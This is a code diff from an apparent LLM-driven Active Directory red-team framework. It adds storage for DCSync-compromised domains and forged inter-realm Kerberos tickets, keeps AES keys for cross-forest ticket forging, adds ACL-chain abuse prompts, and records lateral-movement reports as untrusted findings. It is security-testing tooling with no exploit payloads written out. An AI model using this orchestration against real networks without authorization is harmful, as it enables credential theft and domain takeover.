krbtgt has been compromised +/// (full domain admin via DCSync). Mirrors `state.dominated_domains` so +/// post-mortem reports and `SCARD` checks see the same view. +pub const KEY_DOMINATED_DOMAINS: &str = "dominated_domains"; /// Redis STRING key suffix for operation status JSON. pub const KEY_STATUS: &str = "status"; @@ -161,6 +168,10 @@ pub const BLUE_OP_PREFIX: &str = "ares:blue:op"; #[cfg(feature = "blue")] pub const BLUE_STATUS_PREFIX: &str = "ares:blue:inv"; +/// Redis HASH key suffix for forged inter-realm Kerberos tickets. +/// Field = `{source}:{target}:{username}`, value = `KerberosTicket` JSON. +pub const KEY_KERBEROS_TICKETS: &str = "kerberos_tickets"; + #[cfg(test)] mod tests { use super::*; @@ -201,6 +212,7 @@ mod tests { KEY_DOMAIN_SIDS, KEY_ADMIN_NAMES, KEY_TRUSTED_DOMAINS, + KEY_DOMINATED_DOMAINS, KEY_STATUS, KEY_MODEL, KEY_STOP_REQUESTED, @@ -247,6 +259,7 @@ mod tests { KEY_DOMAIN_SIDS, KEY_ADMIN_NAMES, KEY_TRUSTED_DOMAINS, + KEY_DOMINATED_DOMAINS, KEY_STATUS, KEY_MODEL, KEY_STOP_REQUESTED, diff --git a/ares-core/src/state/mock_redis.rs b/ares-core/src/state/mock_redis.rs index de7bbd13..639cefbf 100644 --- a/ares-core/src/state/mock_redis.rs +++ b/ares-core/src/state/mock_redis.rs @@ -12,6 +12,10 @@ use std::sync::{Arc, Mutex}; use redis::aio::ConnectionLike; use redis::{Cmd, ErrorKind, Pipeline, RedisError, RedisResult, Value}; +// --------------------------------------------------------------------------- +// Storage types +// --------------------------------------------------------------------------- + enum Stored { Str(Vec), Hash(HashMap, Vec>), @@ -21,6 +25,10 @@ enum Stored { type Data = HashMap; +// --------------------------------------------------------------------------- +// MockRedisConnection +// --------------------------------------------------------------------------- + /// Minimal in-memory Redis mock that supports the command subset used by /// `ares-core::state` and `ares-cli::orchestrator::task_queue`. #[derive(Clone)] @@ -96,6 +104,10 @@ impl MockRedisConnection { } } +// --------------------------------------------------------------------------- +// ConnectionLike impl +// --------------------------------------------------------------------------- + impl ConnectionLike for MockRedisConnection { fn req_packed_command<'a>(&'a mut self, cmd: &'a Cmd) -> redis::RedisFuture<'a, Value> { let mut data = self.data.lock().unwrap(); @@ -126,6 +138,10 @@ impl ConnectionLike for MockRedisConnection { } } +// --------------------------------------------------------------------------- +// Command implementations (free functions operating on Data) +// --------------------------------------------------------------------------- + fn key(args: &[Vec], idx: usize) -> String { String::from_utf8_lossy(args.get(idx).map(|v| v.as_slice()).unwrap_or_default()).into_owned() } @@ -523,6 +539,10 @@ fn cmd_scan(data: &Data, args: &[Vec]) -> RedisResult { ])) } +// --------------------------------------------------------------------------- +// Minimal glob matching (supports only `*` wildcard segments) +// --------------------------------------------------------------------------- + fn glob_match(pattern: &str, input: &str) -> bool { let parts: Vec<&str> = pattern.split('*').collect(); if parts.len() == 1 { diff --git a/ares-core/src/state/reader.rs b/ares-core/src/state/reader.rs index 5b6bd72b..2dcd8d44 100644 --- a/ares-core/src/state/reader.rs +++ b/ares-core/src/state/reader.rs @@ -6,7 +6,7 @@ use chrono::Utc; use redis::AsyncCommands; use crate::models::{ - Credential, Hash, Host, OperationMeta, Share, SharedRedTeamState, Target, User, + Credential, Hash, Host, KerberosTicket, OperationMeta, Share, SharedRedTeamState, Target, User, VulnerabilityInfo, }; @@ -347,8 +347,26 @@ impl RedisStateReader { let added: bool = conn.hset_nx(&key, &dedup_field, &data).await?; if added { let _: () = conn.expire(&key, 86400).await?; + return Ok(true); } - Ok(added) + + // Upsert path: a prior call added this user/hash with no AES256 key, + // and this call carries one. Win2016+ DCs reject RC4-only inter-realm + // tickets, so the AES key is required for cross-forest forge — we + // can't afford to lose it to dedup. + if hash.aes_key.is_some() { + let existing: Option = conn.hget(&key, &dedup_field).await?; + let existing_has_aes = existing + .as_deref() + .and_then(|s| serde_json::from_str::(s).ok()) + .and_then(|h| h.aes_key) + .is_some(); + if !existing_has_aes { + let _: () = conn.hset(&key, &dedup_field, &data).await?; + let _: () = conn.expire(&key, 86400).await?; + } + } + Ok(false) } /// Set a meta field in the operation's meta HASH. @@ -380,6 +398,27 @@ impl RedisStateReader { Ok(()) } + /// Get a domain SID from the `domain_sids` HASH. + pub async fn get_domain_sid( + &self, + conn: &mut impl AsyncCommands, + domain: &str, + ) -> Result, redis::RedisError> { + let key = self.key(KEY_DOMAIN_SIDS); + let sid: Option = conn.hget(&key, domain).await?; + Ok(sid) + } + + /// Get all domain SIDs from the `domain_sids` HASH (lowercase keys). + pub async fn get_domain_sids( + &self, + conn: &mut impl AsyncCommands, + ) -> Result, redis::RedisError> { + let key = self.key(KEY_DOMAIN_SIDS); + let data: HashMap = conn.hgetall(&key).await?; + Ok(data) + } + /// Set the RID-500 account name for a domain in the `admin_names` HASH. pub async fn set_admin_name( &self, @@ -393,6 +432,48 @@ impl RedisStateReader { Ok(()) } + /// Get the RID-500 account name for a domain from the `admin_names` HASH. + pub async fn get_admin_name( + &self, + conn: &mut impl AsyncCommands, + domain: &str, + ) -> Result, redis::RedisError> { + let key = self.key(KEY_ADMIN_NAMES); + let name: Option = conn.hget(&key, domain).await?; + Ok(name) + } + + /// Add a forged inter-realm Kerberos ticket to `ares:op:{id}:kerberos_tickets` HASH. + /// + /// Keyed by `{source}:{target}:{username}` for dedup. A newer ticket for + /// the same principal silently overwrites the old one (`HSET`, not `HSETNX`). + pub async fn add_kerberos_ticket( + &self, + conn: &mut impl AsyncCommands, + ticket: &KerberosTicket, + ) -> Result<(), redis::RedisError> { + let key = self.key(KEY_KERBEROS_TICKETS); + let field = ticket.dedup_key(); + let data = serde_json::to_string(ticket).unwrap_or_default(); + let _: () = conn.hset(&key, &field, &data).await?; + let _: () = conn.expire(&key, 86400).await?; + Ok(()) + } + + /// Load all forged Kerberos tickets from `ares:op:{id}:kerberos_tickets` HASH. + pub async fn get_kerberos_tickets( + &self, + conn: &mut impl AsyncCommands, + ) -> Result, redis::RedisError> { + let key = self.key(KEY_KERBEROS_TICKETS); + let items: std::collections::HashMap = conn.hgetall(&key).await?; + let result = items + .into_values() + .filter_map(|json_str| try_deserialize(&json_str, "kerberos_ticket")) + .collect(); + Ok(result) + } + /// Add a share to `ares:op:{id}:shares` HASH (with dedup by host+name). pub async fn add_share( &self, diff --git a/ares-core/src/telemetry/init.rs b/ares-core/src/telemetry/init.rs index aea64eff..bbfeaec2 100644 --- a/ares-core/src/telemetry/init.rs +++ b/ares-core/src/telemetry/init.rs @@ -82,6 +82,7 @@ pub fn init_telemetry(config: TelemetryConfig) -> TelemetryGuard { .unwrap_or_else(|_| EnvFilter::new(&config.default_filter)); let fmt_layer = tracing_subscriber::fmt::layer() + .with_writer(std::io::stderr) .with_target(config.show_target) .with_thread_ids(false) .with_file(false) diff --git a/ares-core/src/telemetry/spans/builder.rs b/ares-core/src/telemetry/spans/builder.rs index 8e6b58c5..e8600c40 100644 --- a/ares-core/src/telemetry/spans/builder.rs +++ b/ares-core/src/telemetry/spans/builder.rs @@ -58,13 +58,24 @@ impl AgentSpanBuilder { self } + /// Set the target IP. Rejects CIDR ranges and multi-value strings. pub fn target_ip(mut self, ip: impl Into) -> Self { - self.target.ip = Some(ip.into()); + let ip = ip.into(); + // Defense-in-depth: reject values that aren't single IP addresses. + // extract_target_info should already sanitize, but guard here too. + if !ip.contains('/') && !ip.contains(' ') && ip.parse::().is_ok() { + self.target.ip = Some(ip); + } self } + /// Set the target FQDN. Rejects multi-value strings. pub fn target_fqdn(mut self, fqdn: impl Into) -> Self { - self.target.fqdn = Some(fqdn.into()); + let fqdn = fqdn.into(); + // Defense-in-depth: reject values containing spaces or slashes + if !fqdn.contains(' ') && !fqdn.contains('/') { + self.target.fqdn = Some(fqdn); + } self } diff --git a/ares-core/src/telemetry/target.rs b/ares-core/src/telemetry/target.rs index d7fd9f26..68eced4d 100644 --- a/ares-core/src/telemetry/target.rs +++ b/ares-core/src/telemetry/target.rs @@ -17,6 +17,11 @@ pub struct ToolTargetInfo { /// - IP: `target_ip`, `target`, `host`, `ip` (if it looks like an IP) /// - FQDN: `target_fqdn`, `target`, `host`, `hostname` (if it looks like an FQDN) /// - User: `username`, `user`, `target_user` +/// +/// Values are sanitized before validation: multi-token strings (e.g., +/// `"192.168.58.10 192.168.58.20"` or nmap arguments) are split and only the +/// first token is considered. CIDR ranges (`10.0.0.0/24`) are rejected +/// because they represent networks, not individual hosts. pub fn extract_target_info(arguments: &serde_json::Value) -> ToolTargetInfo { let mut info = ToolTargetInfo::default(); @@ -25,21 +30,23 @@ pub fn extract_target_info(arguments: &serde_json::Value) -> ToolTargetInfo { None => return info, }; - // Extract IP + // Extract IP — sanitize multi-token values first for key in &["target_ip", "target", "host", "ip"] { if let Some(val) = obj.get(*key).and_then(|v| v.as_str()) { - if is_ip_address(val) { - info.target_ip = Some(val.to_string()); + let sanitized = first_token(val); + if !is_cidr(sanitized) && is_ip_address(sanitized) { + info.target_ip = Some(sanitized.to_string()); break; } } } - // Extract FQDN + // Extract FQDN — sanitize multi-token values first for key in &["target_fqdn", "target", "host", "hostname"] { if let Some(val) = obj.get(*key).and_then(|v| v.as_str()) { - if is_likely_fqdn(val) { - info.target_fqdn = Some(val.to_string()); + let sanitized = first_token(val); + if is_likely_fqdn(sanitized) { + info.target_fqdn = Some(sanitized.to_string()); break; } } @@ -110,6 +117,29 @@ pub fn infer_target_type_from_info(info: &ToolTargetInfo) -> Option<&'static str None } +/// Extract the first whitespace/comma-delimited token from a string. +/// +/// Handles cases where LLM agents pass multi-IP scan results or +/// nmap arguments in a single field, e.g.: +/// - `"192.168.58.10 192.168.58.20 192.168.58.30"` → `"192.168.58.10"` +/// - `"192.168.58.40 -p 53,88 --open"` → `"192.168.58.40"` +fn first_token(s: &str) -> &str { + s.split_whitespace().next().unwrap_or(s) +} + +/// Returns true for CIDR notation like `10.0.0.0/24`. +/// +/// CIDR ranges represent networks, not individual hosts, so they +/// must not be used as `destination.address` span values. +fn is_cidr(s: &str) -> bool { + if let Some((ip_part, mask)) = s.rsplit_once('/') { + if let Ok(bits) = mask.parse::() { + return bits <= 128 && ip_part.parse::().is_ok(); + } + } + false +} + fn is_ip_address(s: &str) -> bool { s.parse::().is_ok() } @@ -182,6 +212,66 @@ mod tests { assert!(info.target_fqdn.is_none()); } + #[test] + fn extract_target_info_rejects_cidr() { + let args = serde_json::json!({"target": "192.168.58.0/24"}); + let info = extract_target_info(&args); + assert!( + info.target_ip.is_none(), + "CIDR should not be used as target_ip" + ); + assert!(info.target_fqdn.is_none()); + } + + #[test] + fn extract_target_info_rejects_cidr_in_target_ip() { + let args = serde_json::json!({"target_ip": "192.168.58.0/25"}); + let info = extract_target_info(&args); + assert!( + info.target_ip.is_none(), + "CIDR should not be used as target_ip" + ); + } + + #[test] + fn extract_target_info_multi_ip_takes_first() { + let args = serde_json::json!({"target": "192.168.58.10 192.168.58.20 192.168.58.30"}); + let info = extract_target_info(&args); + assert_eq!(info.target_ip.as_deref(), Some("192.168.58.10")); + } + + #[test] + fn extract_target_info_nmap_args_takes_first_ip() { + let args = serde_json::json!({"target": "192.168.58.40 -p 53,88,135 --open -sv -o"}); + let info = extract_target_info(&args); + assert_eq!(info.target_ip.as_deref(), Some("192.168.58.40")); + } + + #[test] + fn extract_target_info_multi_fqdn_takes_first() { + let args = serde_json::json!({"target": "dc01.contoso.local dc02.contoso.local"}); + let info = extract_target_info(&args); + assert_eq!(info.target_fqdn.as_deref(), Some("dc01.contoso.local")); + } + + #[test] + fn first_token_extracts_correctly() { + assert_eq!(first_token("192.168.58.10 192.168.58.20"), "192.168.58.10"); + assert_eq!(first_token("192.168.58.40 -p 53,88"), "192.168.58.40"); + assert_eq!(first_token("single"), "single"); + assert_eq!(first_token(""), ""); + } + + #[test] + fn is_cidr_detects_ranges() { + assert!(is_cidr("192.168.58.0/24")); + assert!(is_cidr("192.168.0.0/16")); + assert!(is_cidr("10.0.0.0/8")); + assert!(!is_cidr("192.168.58.10")); + assert!(!is_cidr("dc01.contoso.local")); + assert!(!is_cidr("192.168.58.0/abc")); + } + #[test] fn infer_from_info_fqdn() { let info = ToolTargetInfo { diff --git a/ares-llm/src/agent_loop/callbacks.rs b/ares-llm/src/agent_loop/callbacks.rs index 28f11eec..4687ba77 100644 --- a/ares-llm/src/agent_loop/callbacks.rs +++ b/ares-llm/src/agent_loop/callbacks.rs @@ -61,10 +61,37 @@ pub(super) fn handle_builtin_callback(call: &ToolCall) -> Result .as_str() .unwrap_or("") .to_string(); - info!(finding_type = %finding_type, "Finding reported: {description}"); - Ok(CallbackResult::Continue(format!( - "Finding recorded: {finding_type}" - ))) + let target = call.arguments["target"].as_str().unwrap_or("").to_string(); + let severity = call.arguments["severity"] + .as_str() + .unwrap_or("info") + .to_string(); + info!(finding_type = %finding_type, target = %target, severity = %severity, "Finding reported: {description}"); + + // Route into `llm_findings` (NOT `discoveries`). The LLM-asserted + // payload reaches reports for context but MUST NOT feed + // `publish_vulnerability` — only parser-produced discoveries do. + let vuln_id = if target.is_empty() { + format!("finding_{finding_type}") + } else { + format!("finding_{}_{}", finding_type, target.replace('.', "_")) + }; + let finding = serde_json::json!({ + "vulnerabilities": [{ + "vuln_id": vuln_id, + "vuln_type": finding_type, + "target": target, + "details": { + "description": description, + "severity": severity, + "discovered_by": "agent_report_finding", + }, + }] + }); + Ok(CallbackResult::LlmFinding { + response: format!("Finding recorded: {finding_type}"), + finding, + }) } "report_lateral_success" => { let target = call.arguments["target_ip"] @@ -77,9 +104,25 @@ pub(super) fn handle_builtin_callback(call: &ToolCall) -> Result .unwrap_or("") .to_string(); info!(target = %target, technique = %technique, "Lateral movement succeeded"); - Ok(CallbackResult::Continue(format!( - "Lateral movement recorded: {technique} → {target}" - ))) + + // Surface as an LLM finding only — does NOT feed `publish_vulnerability`. + let vuln_id = format!("lateral_success_{}_{}", technique, target.replace('.', "_")); + let finding = serde_json::json!({ + "vulnerabilities": [{ + "vuln_id": vuln_id, + "vuln_type": format!("lateral_{technique}"), + "target": target, + "details": { + "description": format!("Successful lateral movement via {technique}"), + "severity": "high", + "discovered_by": "agent_lateral_movement", + }, + }] + }); + Ok(CallbackResult::LlmFinding { + response: format!("Lateral movement recorded: {technique} → {target}"), + finding, + }) } "report_lateral_failed" => { let target = call.arguments["target_ip"] @@ -344,14 +387,18 @@ mod tests { fn report_finding() { let call = make_call( "report_finding", - serde_json::json!({"finding_type": "kerberoastable_account", "description": "Found SPN"}), + serde_json::json!({"finding_type": "kerberoastable_account", "description": "Found SPN", "target": "192.168.58.10"}), ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("kerberoastable_account")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("kerberoastable_account")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "kerberoastable_account"); + assert_eq!(vulns[0]["target"], "192.168.58.10"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } @@ -363,11 +410,14 @@ mod tests { ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("psexec")); - assert!(msg.contains("192.168.58.10")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("psexec")); + assert!(response.contains("192.168.58.10")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "lateral_psexec"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } @@ -380,11 +430,13 @@ mod tests { ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("wmiexec")); - assert!(msg.contains("srv01.contoso.local")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("wmiexec")); + assert!(response.contains("srv01.contoso.local")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["vuln_type"], "lateral_wmiexec"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } diff --git a/ares-llm/src/agent_loop/mod.rs b/ares-llm/src/agent_loop/mod.rs index 0a44f3df..f06782f3 100644 --- a/ares-llm/src/agent_loop/mod.rs +++ b/ares-llm/src/agent_loop/mod.rs @@ -25,7 +25,7 @@ pub use runner::{run_agent_loop, HostnameMap}; pub use session_log::{replay_messages, SessionLog}; pub use types::{ AgentLoopOutcome, CallbackHandler, CallbackResult, LoopEndReason, ToolDispatcher, - ToolExecResult, + ToolExecResult, ToolOutput, }; mod types; diff --git a/ares-llm/src/agent_loop/runner.rs b/ares-llm/src/agent_loop/runner.rs index 72ab7db9..f2962921 100644 --- a/ares-llm/src/agent_loop/runner.rs +++ b/ares-llm/src/agent_loop/runner.rs @@ -127,7 +127,8 @@ pub async fn run_agent_loop( let mut steps: u32 = 0; let mut tool_calls_dispatched: u32 = 0; let mut all_discoveries: Vec = Vec::new(); - let mut all_tool_outputs: Vec = Vec::new(); + let mut all_llm_findings: Vec = Vec::new(); + let mut all_tool_outputs: Vec = Vec::new(); // Dynamic tool filtering: track unavailable tools and per-tool call counts // to prevent infinite retry loops on missing binaries and runaway tool calls. @@ -146,6 +147,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -170,6 +172,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -227,6 +230,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -263,6 +267,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -274,6 +279,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -404,8 +410,17 @@ pub async fn run_agent_loop( let output = truncate_tool_output(&dr.output, config.context.max_tool_output_chars); - // Collect raw tool output for secondary regex extraction - all_tool_outputs.push(dr.output.clone()); + // Collect raw tool output (with tool name + args) for secondary + // regex extraction. Tool-aware extractors use the args to skip + // patterns that would misclassify echoed inputs (e.g. nxc -H + // echoes the hash on the same `[+] DOMAIN\user:secret` line that + // password-auth would emit, so the secret must not be ingested + // as a credential when args carry hash flags). + all_tool_outputs.push(crate::ToolOutput { + name: call.name.clone(), + arguments: call.arguments.clone(), + output: dr.output.clone(), + }); let tr = ChatMessage::tool_result(&call.id, &output); if session_log.enabled() { session_log.record_message(steps, &tr); @@ -551,6 +566,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -563,6 +579,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -573,6 +590,10 @@ pub async fn run_agent_loop( } messages.push(tr); } + Ok(CallbackResult::LlmFinding { response, finding }) => { + all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call_id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result( &call_id, @@ -625,6 +646,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -637,6 +659,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -647,6 +670,10 @@ pub async fn run_agent_loop( } messages.push(tr); } + Ok(CallbackResult::LlmFinding { response, finding }) => { + all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call.id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result(&call.id, format!("Callback error: {e}")); @@ -697,6 +724,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -709,6 +737,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -719,6 +748,10 @@ pub async fn run_agent_loop( } messages.push(tr); } + Ok(CallbackResult::LlmFinding { response, finding }) => { + all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call.id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result(&call.id, format!("Callback error: {e}")); if session_log.enabled() { @@ -734,6 +767,7 @@ pub async fn run_agent_loop( /// Centralized exit path: writes the terminal `outcome` record to the /// session log and assembles the `AgentLoopOutcome`. +#[allow(clippy::too_many_arguments)] fn finish( session_log: &SessionLog, steps: u32, @@ -741,7 +775,8 @@ fn finish( total_usage: TokenUsage, tool_calls_dispatched: u32, discoveries: Vec, - tool_outputs: Vec, + llm_findings: Vec, + tool_outputs: Vec, ) -> AgentLoopOutcome { if session_log.enabled() { let (label, detail) = describe_reason(&reason); @@ -753,6 +788,7 @@ fn finish( steps, tool_calls_dispatched, discoveries, + llm_findings, tool_outputs, } } diff --git a/ares-llm/src/agent_loop/tests.rs b/ares-llm/src/agent_loop/tests.rs index e9bdec6c..f683be0b 100644 --- a/ares-llm/src/agent_loop/tests.rs +++ b/ares-llm/src/agent_loop/tests.rs @@ -57,10 +57,12 @@ fn handle_report_finding_callback() { }; let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("smb_signing_disabled")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("smb_signing_disabled")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["vuln_type"], "smb_signing_disabled"); } - _ => panic!("Expected Continue"), + _ => panic!("Expected LlmFinding"), } } diff --git a/ares-llm/src/agent_loop/types.rs b/ares-llm/src/agent_loop/types.rs index 9c3bf8bf..71baea5a 100644 --- a/ares-llm/src/agent_loop/types.rs +++ b/ares-llm/src/agent_loop/types.rs @@ -13,6 +13,18 @@ pub struct ToolExecResult { pub discoveries: Option, } +/// Raw stdout from a single tool dispatch, paired with the tool name and +/// arguments that produced it. Carried through `AgentLoopOutcome` so secondary +/// regex extractors downstream can be tool-aware (e.g. skip `[+] DOMAIN\user:secret` +/// credential extraction when the tool was invoked with hash-auth flags — the +/// "secret" is just the hash echoed back, not a discovered password). +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct ToolOutput { + pub name: String, + pub arguments: serde_json::Value, + pub output: String, +} + /// Trait for dispatching tool calls to external executors (Python workers). /// /// Implementers handle the Redis queue mechanics (LPUSH to tool_exec queue, @@ -40,6 +52,14 @@ pub enum CallbackResult { RequestAssistance { issue: String, context: String }, /// Callback processed, continue the loop with this response. Continue(String), + /// LLM-fabricated finding — continue the loop and route the structured + /// payload into `llm_findings` (NOT `discoveries`). Reports may surface + /// these for context, but they MUST NOT feed `publish_*` state writes; + /// only parser-produced discoveries are authoritative. + LlmFinding { + response: String, + finding: serde_json::Value, + }, } /// Trait for providing custom callback handlers to the agent loop. @@ -78,9 +98,15 @@ pub struct AgentLoopOutcome { /// Number of tool calls dispatched. pub tool_calls_dispatched: u32, /// Accumulated structured discoveries from all tool results. + /// Only parser-produced — never LLM-fabricated. Safe to feed into + /// `extract_discoveries` → `publish_*`. pub discoveries: Vec, - /// Raw tool output strings for secondary regex extraction. - pub tool_outputs: Vec, + /// LLM-fabricated findings (`report_finding` / `report_lateral_success`). + /// Surfaced in reports but never used as authoritative state — must never + /// feed `publish_*` calls. + pub llm_findings: Vec, + /// Raw tool outputs (name + args + stdout) for secondary regex extraction. + pub tool_outputs: Vec, } /// Why the agent loop stopped. diff --git a/ares-llm/src/lib.rs b/ares-llm/src/lib.rs index 5e443254..8ce383ee 100644 --- a/ares-llm/src/lib.rs +++ b/ares-llm/src/lib.rs @@ -12,5 +12,5 @@ pub use provider::{ pub use agent_loop::{ replay_messages, run_agent_loop, AgentLoopConfig, AgentLoopOutcome, BudgetConfig, CallbackHandler, CallbackResult, ContextConfig, HostnameMap, LoopEndReason, RetryConfig, - SessionLog, SessionLogConfig, ToolDispatcher, ToolExecResult, + SessionLog, SessionLogConfig, ToolDispatcher, ToolExecResult, ToolOutput, }; diff --git a/ares-llm/src/prompt/acl.rs b/ares-llm/src/prompt/acl.rs index 053c9f23..d1c15ed1 100644 --- a/ares-llm/src/prompt/acl.rs +++ b/ares-llm/src/prompt/acl.rs @@ -4,7 +4,7 @@ use serde_json::Value; use tera::Context; use super::helpers::insert_state_context; -use super::templates::{render_template_with_context, TASK_ACL_ANALYSIS}; +use super::templates::{render_template_with_context, TASK_ACL_ANALYSIS, TASK_ACL_CHAIN_STEP}; use super::StateSnapshot; pub(crate) fn generate_acl_analysis_prompt( @@ -26,3 +26,81 @@ pub(crate) fn generate_acl_analysis_prompt( render_template_with_context(TASK_ACL_ANALYSIS, &ctx) } + +/// Render an `acl_chain_step` prompt. +/// +/// Two payload shapes are supported: +/// 1. Flat fields from `auto_dacl_abuse` (acl_type / source_user / target_user / +/// target_ip / domain / vuln_id / credential). +/// 2. Nested `step` object from `auto_acl_chain_follow` (raw BloodHound +/// step). Best-effort extraction of source/target/domain/dc_ip from the +/// step keys, falling back to the credential domain. +pub(crate) fn generate_acl_chain_step_prompt( + task_id: &str, + payload: &Value, + state: Option<&StateSnapshot>, +) -> anyhow::Result { + let mut ctx = Context::new(); + ctx.insert("task_id", task_id); + + let credential = payload.get("credential"); + let cred_username = credential + .and_then(|c| c.get("username")) + .and_then(|v| v.as_str()); + let cred_domain = credential + .and_then(|c| c.get("domain")) + .and_then(|v| v.as_str()); + + let step = payload.get("step"); + + let pick_str = |keys: &[&str]| -> Option { + for k in keys { + if let Some(v) = payload.get(*k).and_then(|v| v.as_str()) { + return Some(v.to_string()); + } + if let Some(s) = step { + if let Some(v) = s.get(*k).and_then(|v| v.as_str()) { + return Some(v.to_string()); + } + } + } + None + }; + + if let Some(v) = pick_str(&["acl_type", "edge_type", "edge", "right"]) { + ctx.insert("acl_type", &v); + } + let source_user = + pick_str(&["source_user", "source", "from"]).or_else(|| cred_username.map(String::from)); + if let Some(ref v) = source_user { + ctx.insert("source_user", v); + } + let source_domain = + pick_str(&["source_domain", "domain"]).or_else(|| cred_domain.map(String::from)); + if let Some(ref v) = source_domain { + ctx.insert("source_domain", v); + } + if let Some(v) = pick_str(&["target_user", "target", "to"]) { + ctx.insert("target_user", &v); + } + if let Some(v) = pick_str(&["domain"]).or_else(|| cred_domain.map(String::from)) { + ctx.insert("domain", &v); + } + if let Some(v) = pick_str(&["target_ip", "dc_ip", "target"]) { + ctx.insert("dc_ip", &v); + } + if let Some(v) = pick_str(&["vuln_id"]) { + ctx.insert("vuln_id", &v); + } + + if let Some(s) = step { + ctx.insert( + "step_json", + &serde_json::to_string_pretty(s).unwrap_or_default(), + ); + } + + insert_state_context(&mut ctx, state, "acl_chain_step", None); + + render_template_with_context(TASK_ACL_CHAIN_STEP, &ctx) +} diff --git a/ares-llm/src/prompt/blue.rs b/ares-llm/src/prompt/blue.rs index 6d2b579c..5bf24702 100644 --- a/ares-llm/src/prompt/blue.rs +++ b/ares-llm/src/prompt/blue.rs @@ -349,6 +349,10 @@ mod tests { use super::*; use serde_json::json; + // ----------------------------------------------------------------------- + // generate_blue_task_prompt + // ----------------------------------------------------------------------- + #[test] fn generate_blue_task_prompt_returns_none_for_unknown_type() { let params = json!({}); @@ -397,6 +401,10 @@ mod tests { assert!(generate_blue_task_prompt("host_investigation", "t-7", ¶ms, "state").is_some()); } + // ----------------------------------------------------------------------- + // blue_role_template + // ----------------------------------------------------------------------- + #[test] fn role_template_triage() { assert_eq!( @@ -445,6 +453,10 @@ mod tests { ); } + // ----------------------------------------------------------------------- + // build_blue_system_prompt + // ----------------------------------------------------------------------- + #[test] fn system_prompt_succeeds_for_triage() { let caps = vec!["query_loki".to_string(), "record_evidence".to_string()]; @@ -505,6 +517,10 @@ mod tests { assert!(!result.is_empty()); } + // ----------------------------------------------------------------------- + // build_initial_alert_prompt + // ----------------------------------------------------------------------- + #[test] fn initial_alert_prompt_extracts_alert_name_from_labels() { let alert = json!({ diff --git a/ares-llm/src/prompt/credential_access/generic.rs b/ares-llm/src/prompt/credential_access/generic.rs index befe262f..2bb29cd6 100644 --- a/ares-llm/src/prompt/credential_access/generic.rs +++ b/ares-llm/src/prompt/credential_access/generic.rs @@ -1,11 +1,16 @@ //! Generic fallback and technique-with-credentials prompt branches. +//! +//! These prompts MUST NOT inline credential values into example tool-call +//! signatures. The worker resolves credentials at dispatch time from operation +//! state. The LLM only sees principal-only signatures (target, username, +//! domain, dc_ip) and a non-secret capability label. use std::collections::HashMap; use serde_json::Value; use tera::Context; -use crate::prompt::helpers::{cred_display_str, cred_param_str, insert_state_context}; +use crate::prompt::helpers::{cred_capability_label, insert_state_context}; use crate::prompt::templates::{ render_template_with_context, TASK_CREDACCESS_FALLBACK, TASK_CREDACCESS_WITH_CREDS, }; @@ -28,63 +33,57 @@ pub(super) fn try_generate_with_creds( let dc_ip = p.dc_ip; let domain = p.domain; let username = p.username; - let cred_param = cred_param_str(payload, p.hash_value); - let cred_display = cred_display_str(payload, p.hash_value); + let cred_capability = cred_capability_label(payload, p.hash_value); + // Example signatures show only LLM-callable fields; the worker injects + // password/hash/aes/ticket from state at dispatch time. let technique_map: HashMap<&str, String> = [ ( "sysvol_script_search", format!( - "sysvol_script_search(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "sysvol_script_search(target='{dc_ip}', username='{username}', domain='{domain}') \ - ~2 seconds, finds hardcoded passwords in login scripts" ), ), 